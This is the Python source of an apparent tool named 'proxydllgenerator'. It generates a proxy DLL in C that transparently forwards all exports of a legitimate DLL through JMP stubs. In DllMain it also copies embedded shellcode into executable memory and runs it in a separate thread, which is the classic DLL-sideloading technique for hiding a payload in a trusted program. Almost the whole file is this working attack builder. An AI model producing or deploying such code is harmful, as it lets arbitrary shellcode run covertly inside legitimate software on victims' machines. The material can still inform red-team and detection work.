"""Generate the proxy DLL C source and DEF file (runtime stub approach)."""

from __future__ import annotations

import os
import re

from .dll_parser import DllInfo, ExportEntry

_BYTES_PER_LINE = 12


def _format_shellcode(data: bytes) -> str:
    lines: list[str] = []
    for i in range(0, len(data), _BYTES_PER_LINE):
        chunk = data[i : i + _BYTES_PER_LINE]
        lines.append("    " + ", ".join(f"0x{b:02x}" for b in chunk))
    return ",\n".join(lines)


def _is_valid_c_identifier(name: str) -> bool:
    return bool(re.match(r"^[A-Za-z_][A-Za-z0-9_]*$", name))


# ---------------------------------------------------------------------------
# C source template
# ---------------------------------------------------------------------------

_C_TEMPLATE = """\
/*
 * Proxy DLL – auto-generated by proxydllgenerator
 * Original : {orig_name}.dll | Arch: {arch}
 */
#include <windows.h>

/* shellcode */
static const unsigned char _sc[] = {{
{shellcode_bytes}
}};

/* function pointers to the real exports */
{func_ptrs}

/* naked JMP stubs – forward every call to the original DLL transparently */
{stubs}

/* shellcode execution thread */
static DWORD WINAPI _ScThread(LPVOID p)
{{
    (void)p;
    LPVOID m = VirtualAlloc(NULL, sizeof(_sc),
                            MEM_COMMIT | MEM_RESERVE,
                            PAGE_EXECUTE_READWRITE);
    if (!m) return 1;
    for (SIZE_T i = 0; i < sizeof(_sc); i++)
        ((unsigned char *)m)[i] = _sc[i];
    ((void (*)(void))m)();
    VirtualFree(m, 0, MEM_RELEASE);
    return 0;
}}

BOOL WINAPI DllMain(HINSTANCE h, DWORD reason, LPVOID reserved)
{{
    (void)reserved;
    if (reason == DLL_PROCESS_ATTACH) {{
        DisableThreadLibraryCalls(h);

        /* load the real DLL first – abort if missing */
        HMODULE orig = LoadLibraryA("{orig_name}.dll");
        if (!orig) return FALSE;

        /* resolve every export */
{getproc_calls}

        /* spawn shellcode in its own thread to avoid holding the loader lock */
        CloseHandle(CreateThread(NULL, 0, _ScThread, NULL, 0, NULL));
    }}
    return TRUE;
}}
"""

# arch-specific indirect JMP instruction (AT&T syntax)
_JMP = {
    "x64": "jmp *_pfn_{safe}(%rip)",
    "x86": "jmp *_pfn_{safe}",
}


def generate_proxy_source(
    shellcode_path: str,
    orig_name: str,
    arch: str,
    exports: list[ExportEntry],
) -> tuple[str, list[tuple[str, str, int]]]:
    """
    Generate C source for the proxy DLL using naked-JMP runtime stubs.

    Returns:
        (c_source_str, valid_exports)
        valid_exports: list of (real_name, safe_c_name, ordinal) for each
                       export included in the generated source.
    """
    with open(shellcode_path, "rb") as fh:
        sc_data = fh.read()
    if not sc_data:
        raise ValueError(f"Shellcode file is empty: {shellcode_path}")

    jmp_tmpl = _JMP[arch]

    func_ptrs: list[str] = []
    stubs: list[str] = []
    getproc_calls: list[str] = []
    valid_exports: list[tuple[str, str, int]] = []

    for exp in exports:
        if exp.name is None:
            continue  # ordinal-only export – cannot generate a named stub

        # Skip names that can't be safely turned into C identifiers even after
        # sanitisation (e.g. pure C++ mangled names starting with '?').
        if not _is_valid_c_identifier(exp.name):
            safe = re.sub(r"[^A-Za-z0-9_]", "_", exp.name)
            if not safe or safe[0].isdigit():
                safe = f"_stub_ord{exp.ordinal}"
        else:
            safe = exp.name

        jmp = jmp_tmpl.format(safe=safe)

        func_ptrs.append(f"static void *_pfn_{safe} = NULL;")
        stubs.append(
            f"__declspec(dllexport)\n"
            f"__attribute__((naked))\n"
            f"void {safe}(void) {{\n"
            f'    __asm__("{jmp}");\n'
            f"}}"
        )
        getproc_calls.append(
            f'        _pfn_{safe} = (void *)GetProcAddress(orig, "{exp.name}");'
        )
        valid_exports.append((exp.name, safe, exp.ordinal))

    c_src = _C_TEMPLATE.format(
        orig_name=orig_name,
        arch=arch,
        shellcode_bytes=_format_shellcode(sc_data),
        func_ptrs="\n".join(func_ptrs),
        stubs="\n\n".join(stubs),
        getproc_calls="\n".join(getproc_calls),
    )
    return c_src, valid_exports


# ---------------------------------------------------------------------------
# DEF file – ordinal assignment only (no linker forwarder entries)
# ---------------------------------------------------------------------------

def generate_def_file(
    proxy_name: str,
    valid_exports: list[tuple[str, str, int]],
) -> str:
    """
    Build a DEF file that only assigns ordinals to the stub functions.
    When safe_name differs from real_name the DEF file maps the symbol
    so the DLL exports the original name.

    valid_exports: list of (real_name, safe_c_name, ordinal)
    """
    lines = [
        "; Proxy DEF – auto-generated by proxydllgenerator",
        "",
        f"LIBRARY {proxy_name}",
        "EXPORTS",
    ]
    for real_name, safe_name, ordinal in valid_exports:
        if real_name == safe_name:
            lines.append(f"    {safe_name} @{ordinal}")
        else:
            # Export the C symbol 'safe_name' under the DLL's real export name
            lines.append(f"    {real_name}={safe_name} @{ordinal}")
    return "\n".join(lines) + "\n"


# ---------------------------------------------------------------------------
# Write both generated files to disk
# ---------------------------------------------------------------------------

def write_build_files(
    build_dir: str,
    proxy_name: str,
    orig_name: str,
    dll_info: DllInfo,
    shellcode_path: str,
    arch: str,
) -> tuple[str, str, int]:
    """
    Write dllmain.c and proxy.def into build_dir.

    Returns:
        (c_path, def_path, skipped_count)
        skipped_count – exports omitted (ordinal-only).
    """
    os.makedirs(build_dir, exist_ok=True)

    c_src, valid_exports = generate_proxy_source(
        shellcode_path=shellcode_path,
        orig_name=orig_name,
        arch=arch,
        exports=dll_info.exports,
    )

    skipped = sum(1 for e in dll_info.exports if e.name is None)

    def_src = generate_def_file(proxy_name, valid_exports)

    c_path = os.path.join(build_dir, "dllmain.c")
    def_path = os.path.join(build_dir, "proxy.def")

    with open(c_path, "w", encoding="utf-8") as fh:
        fh.write(c_src)
    with open(def_path, "w", encoding="utf-8") as fh:
        fh.write(def_src)

    return c_path, def_path, skipped
